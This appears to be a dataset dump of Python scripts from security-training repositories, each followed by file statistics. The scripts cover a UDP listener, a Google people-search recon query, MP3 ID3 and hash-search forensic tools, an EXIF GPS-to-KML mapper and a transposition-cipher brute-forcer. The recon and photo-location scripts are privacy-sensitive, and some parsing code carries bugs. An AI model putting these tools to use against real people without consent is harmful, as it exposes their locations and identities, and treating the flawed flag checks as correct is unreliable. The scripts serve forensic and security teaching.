s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
s.bind((host,port))
s.settimeout(5)
data, addr = s.recvfrom(1024)
print "recevied from ",addr
print "obtained ", data
s.close()
except socket.timeout :
print "Client not connected"
s.close() | 18.3125 | 52 | 0.694805 |
Python-Penetration-Testing-for-Developers | import urllib2
GOOGLE_API_KEY = "{Insert your Google API key}"
target = "packtpub.com"
api_response = urllib2.urlopen("https://www.googleapis.com/plus/v1/people?query="+target+"&key="+GOOGLE_API_KEY).read()
api_response = api_response.split("\n")
for line in api_response:
if "displayName" in line:
print line | 35 | 119 | 0.705882 |
cybersecurity-penetration-testing | '''
MP3-ID3Forensics
Python Script (written completely in Python)
For the extraction of meta data and
potential evidence hidden in MP3 files
specifically in the ID3 Headers
Author C. Hosmer
Python Forensics
Copyright (c) 2015-2016 Chet Hosmer / Python Forensics, Inc.
Permission is hereby granted, free of charge, to any person obtaining a copy of this software
and associated documentation files (the "Software"), to deal in the Software without restriction,
including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so,
subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial
portions of the Software.
'''
# IMPORT MODULES
# Standard Python Libraries
import os # Standard Operating System Methods
import argparse # Command Line Argument Parsing
from struct import * # Handle Strings as Binary Data
import string # Special string Module
import time # Date Time Module
# Function: GetTime()
#
# Returns a string containing the current time
#
# Script will use the local system clock, time, date and timezone
# to calcuate the current time. Thus you should sync your system
# clock before using this script
#
# Input: timeStyle = 'UTC', 'LOCAL', the function will default to
# UTC Time if you pass in nothing.
def GetTime(timeStyle = "UTC"):
if timeStyle == 'UTC':
return ('UTC Time: ', time.asctime(time.gmtime(time.time())))
else:
return ('LOC Time: ', time.asctime(time.localtime(time.time())))
# End GetTime Function ============================
#
# Print Hexidecimal / ASCII Page Heading
#
def PrintHeading():
print("Offset 00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F ASCII")
print("------------------------------------------------------------------------------------------------")
return
# End PrintHeading
#
# Print ID3 Frame Contents
#
# Input: buff - Holding the frame content
# buffSize - Size of the frame contents
#
def PrintContents(buff, buffSize):
PrintHeading()
offset = 0
# Loop through 1 line at a time
for i in range(offset, offset+buffSize, 16):
# Print the current offset
print "%08x " % i,
# Print 16 Hex Bytes
for j in range(0,16):
if i+j >= buffSize:
print ' ',
else:
byteValue = ord(buff[i+j])
print "%02x " % byteValue,
print " ",
# Print 16 Ascii equivelents
for j in range (0,16):
if i+j >= buffSize:
break
byteValue = ord(buff[i+j])
# If printable characters print them
if (byteValue >= 0x20 and byteValue <= 0x7f):
print "%c" % byteValue,
else:
print '.',
print
return
# End Print Buffer
'''
ID3 Class
Extracting Meta and Evidence from mp3 files
'''
class ID3():
#Class Constructor
def __init__(self, theFile):
# Initialize Attributes of the Object
# Local Constants
self.KNOWN_TAGS_V3 = {
'AENC': 'Audio encryption: ',
'APIC': 'Attached picture: ',
'COMM': 'Comments: ',
'COMR': 'Commercial frame: ',
'ENCR': 'Encryption method registration: ',
'EQUA': 'Equalization: ',
'ETCO': 'Event timing codes: ',
'GEOB': 'General encapsulated object: ',
'GRID': 'Grp identification registration: ',
'IPLS': 'Involved people list: ',
'LINK': 'Linked information: ',
'MCDI': 'Music CD identifier: ',
'MLLT': 'MPEG location lookup table: ',
'OWNE': 'Ownership frame: ',
'PRIV': 'Private frame: ',
'PCNT': 'Play counter: ',
'POPM': 'Popularimeter: ',
'POSS': 'Position synchronisation frame: ',
'RBUF': 'Recommended buffer size: ',
'RGAD': 'Replay Gain Adjustment: ',
'RVAD': 'Relative volume adjustment: ',
'RVRB': 'Reverb: ',
'SYLT': 'Synchronized lyric/text: ',
'SYTC': 'Synchronized tempo codes: ',
'TALB': 'Album/Movie/Show title: ',
'TBPM': 'BPM beats per minute: ',
'TCOM': 'Composer: ',
'TCON': 'Content type: ',
'TCOP': 'Copyright message: ',
'TDAT': 'Date: ',
'TDLY': 'Playlist delay: ',
'TDRC': 'Recording Time: ',
'TENC': 'Encoded by: ',
'TEXT': 'Lyricist/Text writer: ',
'TFLT': 'File type: ',
'TIME': 'Time: ',
'TIT1': 'Content group description: ',
'TIT2': 'Title/songname/content descrip: ',
'TIT3': 'Subtitle/Description refinement: ',
'TKEY': 'Initial key: ',
'TLAN': 'Language: ',
'TLEN': 'Length: ',
'TMED': 'Media type: ',
'TOAL': 'Original album/movie/show title: ',
'TOFN': 'Original filename: ',
'TOLY': 'Original lyricist/text writer: ',
'TOPE': 'Original artist/performer: ',
'TORY': 'Original release year: ',
'TOWN': 'File owner/licensee: ',
'TPE1': 'Lead performer/Soloist: ',
'TPE2': 'Band/orchestra/accompaniment: ',
'TPE3': 'Conductor/performer refinement: ',
'TPE4': 'Interpreted, remixed, modified by:',
'TPOS': 'Part of a set: ',
'TPUB': 'Publisher: ',
'TRCK': 'Track number/Position in set: ',
'TRDA': 'Recording dates: ',
'TRSN': 'Internet radio station name: ',
'TRSO': 'Internet radio station owner: ',
'TSIZ': 'Size: ',
'TSRC': 'Intl standard recording code: ',
'TSSE': 'SW/HW settings used for encoding: ',
'TYER': 'User defined text frame: ',
'TXXX': 'User define general text frame: ',
'UFID': 'Unique file identifier: ',
'USER': 'Terms of use: ',
'USLT': 'Unsyched lyric/text transcription:',
'WCOM': 'Commercial information: ',
'WCOP': 'Copyright/Legal informationL ',
'WOAF': 'Official audio file webpage: ',
'WOAR': 'Official artist/performer webpage:',
'WOAS': 'Official audio source webpage: ',
'WORS': 'Official internet radio homepage: ',
'WPAY': 'Payment: ',
'WPUB': 'Publishers official webpage: ',
'WXXX': 'User defined URL link frame: '
}
self.KNOWN_TAGS_V2 = {
'BUF': 'Recommended buffer size',
'COM': 'Comments',
'CNT': 'Play counter',
'CRA': 'Audio Encryption',
'CRM': 'Encrypted meta frame',
'ETC': 'Event timing codes',
'EQU': 'Equalization',
'GEO': 'General encapsulated object',
'IPL': 'Involved people list',
'LNK': 'Linked information',
'MCI': 'Music CD Identifier',
'MLL': 'MPEG location lookup table',
'PIC': 'Attached picture',
'POP': 'Popularimeter',
'REV': 'Reverb',
'RVA': 'Relative volume adjustment',
'SLT': 'Synchronized lyric/text',
'STC': 'Synced tempo codes',
'TAL': 'Album/Movie/Show title',
'TBP': 'BPM Beats Per Minute',
'TCM': 'Composer',
'TCO': 'Content type',
'TCR': 'Copyright message',
'TDA': 'Date',
'TDY': 'Playlist delay',
'TEN': 'Encoded by',
'TFT': 'File type',
'TIM': 'Time',
'TKE': 'Initial key',
'TLA': 'Languages',
'TLE': 'Length',
'TMT': 'Media type',
'TOA': 'Original artists/performers',
'TOF': 'Original filename',
'TOL': 'Original Lyricists/text writers',
'TOR': 'Original release year',
'TOT': 'Original album/Movie/Show title',
'TP1': 'Lead artist(s)/Lead performer(s)/Soloist(s)/Performing group',
'TP2': 'Band/Orchestra/Accompaniment',
'TP3': 'Conductor/Performer refinement',
'TP4': 'Interpreted, remixed, or otherwise modified by',
'TPA': 'Part of a set',
'TPB': 'Publisher',
'TRC': 'International Standard Recording Code',
'TRD': 'Recording dates',
'TRK': 'Track number/Position in set',
'TSI': 'Size',
'TSS': 'Software/hardware and settings used for encoding',
'TT1': 'Content group description',
'TT2': 'Title/Songname/Content description',
'TT3': 'Subtitle/Description refinement',
'TXT': 'Lyricist/text writer',
'TXX': 'Year',
'UFI': 'Unique file identifier',
'ULT': 'Unsychronized lyric/text transcription',
'WAF': 'Official audio file webpage',
'WAR': 'Official artist/performer webpage',
'WAS': 'Official audio source webpage',
'WCM': 'Commercial information',
'WCP': 'Copyright/Legal information',
'WPB': 'Publishers official webpage',
'WXX': 'User defined URL link frame'
}
self.picTypeList = [
'Other',
'fileIcon',
'OtherIcon',
'FrontCover',
'BackCover',
'LeafletPage',
'Media',
'LeadArtist',
'ArtistPerformer',
'Conductor',
'BandOrchestra',
'Composer',
'Lyricist',
'RecordingLocation',
'DuringRecording',
'DuringPerformance',
'MovieScreenCapture',
'Fish',
'Illustration',
'BandArtistLogo',
'PublisherStudioLogo'
]
# Attributes of the Class
self.fileName = ''
self.id3Size = 0
self.fileContents = ''
self.mp3 = False
self.id3 = False
self.hdr = ''
self.flag = 0
self.version = 0
self.revision = 0
self.unsync = False
self.extendedHeader = False
self.experimental = False
self.hasPicture = False
self.imageCount = 0
self.frameList = []
self.padArea = ''
# Now Process the Proposed MP3 File
try:
self.fileName = theFile
with open(theFile, 'rb') as mp3File:
self.fileContents = mp3File.read()
except:
print "Could not process input file: ", theFile
quit()
#Strip off the first 10 characters of the file
stripHeader = self.fileContents[0:6]
#now unpack the header
id3Header = unpack('3sBBB', stripHeader)
self.hdr = id3Header[0]
self.version = id3Header[1]
self.revision = id3Header[2]
self.flag = id3Header[3]
if self.hdr == 'ID3' and self.version in range(2,4):
self.id3 = True
else:
self.id3 = False
print "MP3 File type not supported"
quit()
# If we seem to have a valid MP3 ID3 Header
# Attempt to Process the Header
# Get Size Bytes and unpack them
stripSize = self.fileContents[6:10]
id3Size = unpack('BBBB', stripSize)
# Calculate the Size (this is a bit tricky)
# and add in the 10 byte header not included
# in the size
self.id3Size = self.calcID3Size(id3Size) + 10
# check the unsync flag
if self.flag & 0x60:
self.unsync = True
# check the extended header flag
if self.flag & 0x40:
self.extendedHeader = True
# check the experimental indicator
if self.flag & 0x40:
self.experimental = True
self.processID3Frames()
return
'''
Print out any extracted header information
'''
def printResults(self):
print "==== MP3/ID3 Header Information"
print "ID3 Found: ", self.id3
if self.id3:
print "File: ", self.fileName
print "ID3 Hdr Size: ", self.hdr
print "Version: ", self.version
print "Revision: ", self.revision
print "Size: ", self.id3Size
print "Unsync ", self.unsync
print "Extended Header: ", self.extendedHeader
print "Experimental: ", self.experimental
print "Images Found: ", str(self.imageCount)
print "\n------------------------------------------------------------------------"
print "ID3 Frames"
print "------------------------------------------------------------------------"
for entry in self.frameList:
print "FrameID: ", entry[0]
print "Frame Type: ", entry[1]
print "Frame Size: ", entry[2]
print "Tag Preservation: ", entry[4]
print "File Preservation: ", entry[5]
print "Read Only: ", entry[6]
print "Compressed: ", entry[7]
print "Encrypted: ", entry[8]
print "Group Identity: ", entry[9]
print "\nFrame Content:\n"
PrintContents(entry[3], len(entry[3]))
print "====================================================================================================\n"
print "\nPad Area - Size", len(self.padArea)
if len(self.padArea) != 0:
PrintContents(self.padArea, len(self.padArea))
print "\n\n END PyMP3 Forensics"
def processID3Frames(self):
if self.id3:
# starting first frame location
frameOffset = 10
imageCount = 0
# Loop Through all the frames until we reach
# Null ID
# while self.fileContents[frameOffset] != '\000':
while frameOffset < self.id3Size:
# check for padding
if self.fileContents[frameOffset] == '\000':
# we are at the end of the frame
# and we have found padding
# record the pad area
self.padArea = self.fileContents[frameOffset:self.id3Size]
break
if self.version == 2:
# Version 2 Headers contain
# 6 bytes
# sss = type
# xxx = size
frameID = self.fileContents[frameOffset:frameOffset+3]
if frameID in self.KNOWN_TAGS_V2:
frameDescription = self.KNOWN_TAGS_V2[frameID]
else:
frameDescription = 'Unknown'
frameOffset +=3
stripSize = self.fileContents[frameOffset:frameOffset+3]
frameOffset +=3
frameSize = unpack('BBB', stripSize)
integerFrameSize = self.calcFrameSize(frameSize)
# If the frame is a picture
# extract the contents of the picture and create
# a separate file
if frameID == "PIC":
self.hasPicture = True
# bump the image count in case multiple images
# are included in this file
self.imageCount+=1
self.extractPicture(frameOffset, 2, integerFrameSize, self.imageCount)
# For version 2 set all version 3 flags to False
tagPreservation = False
filePreservation = False
readOnly = False
compressed = False
encrypted = False
groupID = 0
elif self.version == 3:
# Version 3 Headers contain
# 10 Bytes
# ssss = Type
# xxxx = size
# xx = flags
v3Header = self.fileContents[frameOffset:frameOffset+10]
frameOffset += 10
try:
frameHeader = unpack('!4sIBB', v3Header)
except:
print "Unpack Failed"
quit()
frameID = frameHeader[0]
integerFrameSize = frameHeader[1]
flag1 = frameHeader[2]
flag2 = frameHeader[3]
if frameID == 'APIC':
self.hasPicture = True
# bump the image count in case multiple images
# are included in this file
self.imageCount+=1
self.extractPicture(frameOffset, 3, integerFrameSize, self.imageCount)
if frameID in self.KNOWN_TAGS_V3:
frameDescription = self.KNOWN_TAGS_V3[frameID]
else:
frameDescription = 'Unknown'
if flag1 & 0x80:
tagPreservation = False
else:
tagPreservation = True
if flag1 & 0x60:
filePreservation = False
else:
filePreservation = True
if flag1 & 0x40:
readOnly = True
else:
readOnly = False
if flag2 & 0x80:
compressed = True
else:
compressed = False
if flag2 & 0x60:
encrypted = True
else:
encrypted = False
if flag2 & 0x40:
groupId = True
else:
groupID = False
else:
print "Version Not Supported"
quit()
frameContent = self.fileContents[frameOffset:frameOffset+integerFrameSize]
frameOffset += integerFrameSize
# Add frame information
self.frameList.append([frameID, frameDescription, integerFrameSize, frameContent, tagPreservation, filePreservation, readOnly, compressed, encrypted, groupID] )
print frameID, frameDescription,
if frameContent[0] == "\000":
frameDump = frameContent[1:]
else:
frameDump = frameContent
frameSnip = ''
if frameID == "COMM":
for eachChar in frameDump:
if eachChar in string.printable:
frameSnip = frameSnip + eachChar
else:
continue
else:
for eachChar in frameDump:
if eachChar in string.printable:
frameSnip = frameSnip + eachChar
else:
break
print frameSnip[0:80]
print
return
'''
extractPicture from ID3 Frame
input: offset to the frame
version (2 or 3)
writes output to an images directory
note the images directory must exist
./images/
'''
def extractPicture(self, off, ver, lenOfFrame, imgCnt):
if ver == 2:
# Now extract the picture type
picType = ''
typeOffset = off+1
while self.fileContents[typeOffset] != '\000':
picType = picType+self.fileContents[typeOffset]
typeOffset+=1
# skip terminating characters
while self.fileContents[typeOffset] == '\000':
typeOffset+=1
# Extract the picture from the content
thePicture = self.fileContents[typeOffset:off+lenOfFrame]
# Create a unique name for the picture relating it back to the original
# filename into a sub-directory named images
imageName = "./images/"+os.path.basename(self.fileName)+".image"+str(imgCnt)+"."+picType
# Open the file for writing and write out the content
with open(imageName, "wb") as out:
out.write(thePicture)
elif ver == 3:
# Now extract the picture type
mimeType = ''
typeOffset = off+1
while self.fileContents[typeOffset] != '\000':
mimeType = mimeType+self.fileContents[typeOffset]
typeOffset+=1
# Set the file extension based on the mime type
if mimeType.find('jpeg'):
ext = "jpg"
elif mimeType.find('png'):
ext = "png"
else:
ext = "dat"
# skip terminating characters
while self.fileContents[typeOffset] == '\000':
typeOffset+=1
# Next Byte is the Picture Type
picType = self.fileContents[typeOffset]
intPicType = ord(picType)
if intPicType >= 0 and intPicType <= len(self.picTypeList):
picTypeStr = self.picTypeList[intPicType]
else:
picTypeStr = "Unknown"
typeOffset += 1
# skip terminating characters
while self.fileContents[typeOffset] == '\000':
typeOffset+=1
# Extract the picture from the content
thePicture = self.fileContents[typeOffset:off+lenOfFrame]
# Create a unique name for the picture relating it back to the original
# filename into a sub-directory named images
imageName = "./images/"+os.path.basename(self.fileName)+'.'+picTypeStr+'.'+str(imgCnt)+"."+ext
# Open the file for writing and write out the content
with open(imageName, "wb") as out:
out.write(thePicture)
'''
Calculate the ID3 Size
The ID3 Size is 28 bits spread over 4 bytes in Big Endian Format
the MSB of each byte is ignored and the remaining 7 bits of each byte are
concatenated together to produce a 28 bit string.
For example the four byte size shown below:
0x0 0x1 0x4a 0x3
Creates the following 28 bit string
0000000000000110010100000011
for a decimal integer value of:
25859
Adding in the 10 header bytes (which is not included in the size)
the total size is:
25869
Excerpt from ID3 Standard
The ID3 tag size is the size of the complete tag after
unsychronisation, including padding, excluding the header (total tag
size - 10). The reason to use 28 bits (representing up to 256MB) for
size description is that we don't want to run out of space here.
calcID3Size(receives a tuple of the four bytes)
'''
def calcID3Size(self, bytes):
# Convert the tuple to a list for easy processing
bytes = list(bytes)
# Ensure that the MSB of each Byte is zero
bytes[0] = bytes[0] & 0x7f
bytes[1] = bytes[1] & 0x7f
bytes[2] = bytes[2] & 0x7f
bytes[3] = bytes[3] & 0x7f
# Initialize the bit string we will create
bits = ""
# loop through each byte setting each
# to a '1' or '0' starting with bit 6
for val in bytes:
i = 64
# continue until we process all bits
# from bit 6-0
while i > 0:
if val & i:
bits = bits + '1'
else:
bits = bits + '0'
# move to the next lower bit
i = i/2
# Now simply Convert the Binary String to an Integer
integerSize = int(bits,2)
return integerSize
'''
Calculate the Frame size from the 3 hex bytes provided
Excerpt from ID3v2 Standard
The three character frame identifier is followed by a three byte size
descriptor, making a total header size of six bytes in every frame.
The size is calculated as framesize excluding frame identifier and
size descriptor (frame size - 6).
calcFrameSize(receives a tuple of the three bytes)
'''
def calcFrameSize(self, bytes):
valList = list(bytes)
finalValue = valList[0] << 16
finalValue = finalValue | valList[1] << 8
finalValue = finalValue | valList[2]
return finalValue
'''
Main Program
'''
def main():
print
print "Python Forensics, Inc. www.python-forensics.org"
print "Python MP3 Forensics v 1.0 June 2016"
print "developed by: C. Hosmer"
print
print "Script Started", GetTime()
print
# Process the command line arguments
parser = argparse.ArgumentParser()
parser.add_argument('mp3File')
theArgs = parser.parse_args()
# Obtain the single argument which is the
# full path name of the file to process
mp3File = theArgs.mp3File
# set the output to verbose
verbose = True
print "Processing MP3 File: ", mp3File
print
# Process the mp3File
objID3 = ID3(mp3File)
# If verbose is selected the print results to standard out
# otherwise create a log file
if objID3.id3:
if verbose:
objID3.printResults()
else:
# Turn on Logging
logging.basicConfig(filename='pSearchLog.log',level=logging.DEBUG,format='%(asctime)s %(message)s')
objID3.logResults()
if __name__ == "__main__":
main() | 34.978287 | 176 | 0.450796 |
cybersecurity-penetration-testing |
'''
Copyright (c) 2016 Chet Hosmer
Permission is hereby granted, free of charge, to any person obtaining a copy of this software
and associated documentation files (the "Software"), to deal in the Software without restriction,
including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so,
subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial
portions of the Software.
Script Purpose: Python HashSearch for MPE+
Script Version: 1.0
Script Author: C.Hosmer
Script Revision History:
Version 1.0 April 2016
'''
# Script Module Importing
# Python Standard Library Modules
import os # Operating/Filesystem Module
import time # Basic Time Module
import logging # Script Logging
import hashlib # Python Hashing Module
from sys import argv # Command Line arguments
# Import 3rd Party Modules
# End of Script Module Importing
# Script Constants
'''
Python does not support constants directly
however, by initializing variables here and
specifying them as UPPER_CASE you can make your
intent known
'''
# General Constants
SCRIPT_NAME = "Script: Hash Search for MPE+ "
SCRIPT_VERSION = "Version 1.0"
SCRIPT_AUTHOR = "Author: C. Hosmer, Python Forensics"
SCRIPT_LOG = "C:/SYN/HashSearch/FORENSIC_LOG.txt"
SRC_HASH = "C:/SYN/HashSearch/Hashes.txt"
CSV = "C:/SYN/HashSearch/results.csv"
# LOG Constants used as input to LogEvent Function
LOG_DEBUG = 0 # Debugging Event
LOG_INFO = 1 # Information Event
LOG_WARN = 2 # Warning Event
LOG_ERR = 3 # Error Event
LOG_CRIT = 4 # Critical Event
LOG_OVERWRITE = True # Set this contstant to True if the SCRIPT_LOG
# should be overwritten, False if not
# End of Script Constants
# Initialize Forensic Logging
try:
# If LOG should be overwritten before
# each run, the remove the old log
if LOG_OVERWRITE:
# Verify that the log exists before removing
if os.path.exists(SCRIPT_LOG):
os.remove(SCRIPT_LOG)
# Initialize the Log include the Level and message
logging.basicConfig(filename=SCRIPT_LOG, format='%(levelname)s\t:%(message)s', level=logging.DEBUG)
except:
print ("Failed to initialize Logging")
quit()
# End of Forensic Log Initialization
# Initialize CSV Output File
# Write Heading Line
try:
csvOut = open(CSV, "w")
csvOut.write("FileName, MD5 Hash, Match, Category \n")
except:
print ("Failed to initialize CSV File .. Make sure file is not open")
quit()
# Script Functions
'''
If you script will contain functions then insert them
here, before the execution of the main script. This
will ensure that the functions will be callable from
anywhere in your script
'''
# Function: GetTime()
#
# Returns a string containing the current time
#
# Script will use the local system clock, time, date and timezone
# to calcuate the current time. Thus you should sync your system
# clock before using this script
#
# Input: timeStyle = 'UTC', 'LOCAL', the function will default to
# UTC Time if you pass in nothing.
def GetTime(timeStyle = "UTC"):
if timeStyle == 'UTC':
return ('UTC Time: ', time.asctime(time.gmtime(time.time())))
else:
return ('LOC Time: ', time.asctime(time.localtime(time.time())))
# End GetTime Function ============================
# Function: LogEvent()
#
# Logs the event message and specified type
# Input:
# eventType: LOG_INFO, LOG_WARN, LOG_ERR, LOG_CRIT or LOG_DEBUG
# eventMessage : string containing the message to be logged
def LogEvent(eventType, eventMessage):
if type(eventMessage) == str:
try:
timeStr = GetTime('UTC')
# Combine current Time with the eventMessage
# You can specify either 'UTC' or 'LOCAL'
# Based on the GetTime parameter
eventMessage = str(timeStr)+": "+eventMessage
if eventType == LOG_INFO:
logging.info(eventMessage)
elif eventType == LOG_DEBUG:
logging.debug(eventMessage)
elif eventType == LOG_WARN:
logging.warning(eventMessage)
elif eventType == LOG_ERR:
logging.error(eventMessage)
elif eventType == LOG_CRIT:
logging.critical(eventMessage)
else:
logging.info(eventMessage)
except:
logging.warn("Event messages must be strings")
else:
logging.warn('Received invalid event message')
# End LogEvent Function =========================
# Simple CSV Write Method
# Without Library Assist
def WriteCSV(fileName, MD5, match, category):
if match:
csvOut.write(fileName+","+MD5+","+ "*** YES ***"+","+category+"\n")
else:
csvOut.write(fileName+","+MD5+","+ " "+","+""+"\n")
# Main Script Starts Here
#
# Script Overview
#
# The purpose of this script it to provide an example
# script that demonstrate and leverage key capabilities
# of Python that provides direct value to the
# forensic investigator.
if __name__ == '__main__':
# Mark the starting time of the main loop
theStart = time.time()
LogEvent(LOG_INFO, SCRIPT_NAME)
LogEvent(LOG_INFO, SCRIPT_VERSION)
LogEvent(LOG_INFO, "Script Started")
# Print Basic Script Information
# For MPE+ Scripts the length of the argument vector is
# always 2 scriptName, path
if len(argv) == 2:
scriptName, path = argv
else:
LogEvent(LOG_INFO, argv + " Invalid Command line")
quit()
LogEvent(LOG_INFO,"Command Line Argument Vector")
LogEvent(LOG_INFO,"Script Name: " + scriptName)
LogEvent(LOG_INFO,"Script Path: " + path)
# Verify the path exists and determine
# the path type
LogEvent(LOG_INFO, "Processing Command Line")
if os.path.exists(path):
LogEvent(LOG_INFO,"Path Exists")
if os.path.isdir(path):
LogEvent(LOG_INFO,"Path is a directory")
else:
LogEvent(LOG_ERR, path + " is not a directory")
quit()
else:
LogEvent(LOG_ERR, path + " Does not exist")
quit()
LogEvent(LOG_INFO, "Reading Hash Values to Search from: "+SRC_HASH)
LogEvent(LOG_INFO, "Creating Dictionary of Hashes")
hashDict = {}
try:
with open(SRC_HASH) as srcHashes:
# for each line in the file extract the hash and id
# then store the result in a dictionary
# key, value pair
# in this case the hash is the key and id is the value
LogEvent(LOG_INFO, "Hashes included in Search")
LogEvent(LOG_INFO, "========== HASHES INCLUDED IN SEARCH ==========")
for eachLine in srcHashes:
if eachLine != "END":
lineList = eachLine.split()
if len(lineList) >= 2:
hashKey = lineList[0].upper()
hashValue = ""
for eachElement in lineList[1:]:
hashValue = hashValue + " " + str(eachElement)
# Strip the newline from the hashValue
hashValue = hashValue.strip()
# Add the key value pair to the dictionary
if hashKey not in hashDict:
hashDict[hashKey] = hashValue
LogEvent(LOG_INFO, hashKey+": "+hashValue)
else:
LogEvent(LOG_WARN, "Duplicate Hash Found: " + hashKey)
else:
# Not a valid entry, continue to next line
continue
else:
break
LogEvent(LOG_INFO, "========== END HASH SEARCH LIST ==========")
except:
LogEvent(LOG_ERR, "Failed to load Hash List: "+SRC_HASH)
LogEvent(LOG_INFO, "========== FILE SEARCH START ==========")
# Create Empty matchList and filesProcessed Count
matchList = []
filesProcessed = 0
# Now process all files in the directory provided
# Including all subdirectories
for root, subdirs, files in os.walk(path):
for curFile in files:
# Create the full pathName
fullPath = os.path.join(root, curFile)
# Generate the hash for the current file
# Default is to use MD5
hasher = hashlib.md5()
with open(fullPath, 'rb') as theTarget:
filesProcessed += 1
# Read the contents of the file and hash them
fileContents = theTarget.read()
hasher.update(fileContents)
# get the resulting hashdigest
hashDigest = hasher.hexdigest().upper()
# Now check for a hash match against the
# list we read in by checking the contents of the dictionary
if hashDigest in hashDict:
# If we find a match log the match and add the match to the matchList
matchDetails = hashDict[hashDigest]
LogEvent(LOG_CRIT, "*** HASH MATCH File *** ")
LogEvent(LOG_CRIT, " MATCH File >> "+ curFile)
LogEvent(LOG_CRIT, " MD5 DIGEST >> "+ hashDigest)
LogEvent(LOG_CRIT, " CATEGORGY >> "+ matchDetails)
# add entry to match list
matchList.append([curFile, hashDigest, matchDetails])
# add entry to the csv file
WriteCSV(curFile,hashDigest,True, matchDetails)
else:
# if no match simply log the file and associated hash value
LogEvent(LOG_INFO, "File >> " + curFile + " MD5 >> " + hashDigest)
# add entry to csv file
WriteCSV(curFile,hashDigest,False, "")
# All files are processed
# close the CSV File for good measure
csvOut.close()
# Post the end of file search to the log
LogEvent(LOG_INFO, "========== FILE SEARCH END ==========")
# Once we process all the files
# Log the contents of the match list
# at the end of the log file
# If any matches were found create a summary at
# the end of the log
if matchList:
LogEvent(LOG_INFO, "")
LogEvent(LOG_CRIT, "==== Matched Hash Summary Start ====")
for eachItem in matchList:
LogEvent(LOG_CRIT, "*** HASH MATCH File *** ")
LogEvent(LOG_CRIT, " MATCH File >> "+ eachItem[0])
LogEvent(LOG_CRIT, " MD5 DIGEST >> "+ eachItem[1])
LogEvent(LOG_CRIT, " CATEGORGY >> "+ eachItem[2])
LogEvent(LOG_CRIT, "==== Matched Hash Summary End ====")
# Record the End Time and calculate the elapsed time
theEnd = time.time()
elapsedTime = theEnd - theStart
# Log the number of Files Processed
# and the elapsed time
LogEvent(LOG_INFO, 'Files Processed: ' + str(filesProcessed))
LogEvent(LOG_INFO, 'Elapsed Time: ' + str(elapsedTime) + ' seconds')
# Now print the contents of the forensic log
with open(SCRIPT_LOG, 'r') as logData:
for eachLine in logData:
print(eachLine)
| 32.848485 | 104 | 0.560964 |
cybersecurity-penetration-testing | __author__ = 'Preston Miller & Chapin Bryce'
__date__ = '20151107'
__version__ = 0.01
__description__ = 'KML Writer'
import os
import simplekml
def writer(output, output_name, output_data):
"""
The writer function writes JPEG and TIFF EXIF GPS data to a Google Earth KML file. This file can be opened
in Google Earth and will use the GPS coordinates to create 'pins' on the map of the taken photo's location.
:param output: The output directory to write the KML file.
:param output_name: The name of the output KML file.
:param output_data: The embedded EXIF metadata to be written
:return:
"""
kml = simplekml.Kml(name=output_name)
for exif in output_data:
if 'Latitude' in exif.keys() and 'Latitude Reference' in exif.keys() and 'Longitude Reference' in exif.keys() and 'Longitude' in exif.keys():
if 'Original Date' in exif.keys():
dt = exif['Original Date']
else:
dt = 'N/A'
if exif['Latitude Reference'] == 'S':
latitude = '-' + exif['Latitude']
else:
latitude = exif['Latitude']
if exif['Longitude Reference'] == 'W':
longitude = '-' + exif['Longitude']
else:
longitude = exif['Longitude']
kml.newpoint(name=exif['Name'], description='Originally Created: ' + dt,
coords=[(longitude, latitude)])
else:
pass
kml.save(os.path.join(output, output_name))
| 34.045455 | 149 | 0.583387 |
cybersecurity-penetration-testing | # Transposition Cipher Hacker
# http://inventwithpython.com/hacking (BSD Licensed)
import pyperclip, detectEnglish, transpositionDecrypt
def main():
# You might want to copy & paste this text from the source code at
# http://invpy.com/transpositionHacker.py
myMessage = """Cb b rssti aieih rooaopbrtnsceee er es no npfgcwu plri ch nitaalr eiuengiteehb(e1 hilincegeoamn fubehgtarndcstudmd nM eu eacBoltaeteeoinebcdkyremdteghn.aa2r81a condari fmps" tad l t oisn sit u1rnd stara nvhn fsedbh ee,n e necrg6 8nmisv l nc muiftegiitm tutmg cm shSs9fcie ebintcaets h aihda cctrhe ele 1O7 aaoem waoaatdahretnhechaopnooeapece9etfncdbgsoeb uuteitgna.rteoh add e,D7c1Etnpneehtn beete" evecoal lsfmcrl iu1cifgo ai. sl1rchdnheev sh meBd ies e9t)nh,htcnoecplrrh ,ide hmtlme. pheaLem,toeinfgn t e9yce da' eN eMp a ffn Fc1o ge eohg dere.eec s nfap yox hla yon. lnrnsreaBoa t,e eitsw il ulpbdofgBRe bwlmprraio po droB wtinue r Pieno nc ayieeto'lulcih sfnc ownaSserbereiaSm-eaiah, nnrttgcC maciiritvledastinideI nn rms iehn tsigaBmuoetcetias rn"""
hackedMessage = hackTransposition(myMessage)
if hackedMessage == None:
print('Failed to hack encryption.')
else:
print('Copying hacked message to clipboard:')
print(hackedMessage)
pyperclip.copy(hackedMessage)
def hackTransposition(message):
print('Hacking...')
# Python programs can be stopped at any time by pressing Ctrl-C (on
# Windows) or Ctrl-D (on Mac and Linux)
print('(Press Ctrl-C or Ctrl-D to quit at any time.)')
# brute-force by looping through every possible key
for key in range(1, len(message)):
print('Trying key #%s...' % (key))
decryptedText = transpositionDecrypt.decryptMessage(key, message)
if detectEnglish.isEnglish(decryptedText):
# Check with user to see if the decrypted key has been found.
print()
print('Possible encryption hack:')
print('Key %s: %s' % (key, decryptedText[:100]))
print()
print('Enter D for done, or just press Enter to continue hacking:')
response = input('> ')
if response.strip().upper().startswith('D'):
return decryptedText
return None
if __name__ == '__main__':
main()
| 45.94 | 785 | 0.680733 |
cybersecurity-penetration-testing | # Volatility
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or (at
# your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
"""
@author: Holger Macht
@license: GNU General Public License 2.0 or later
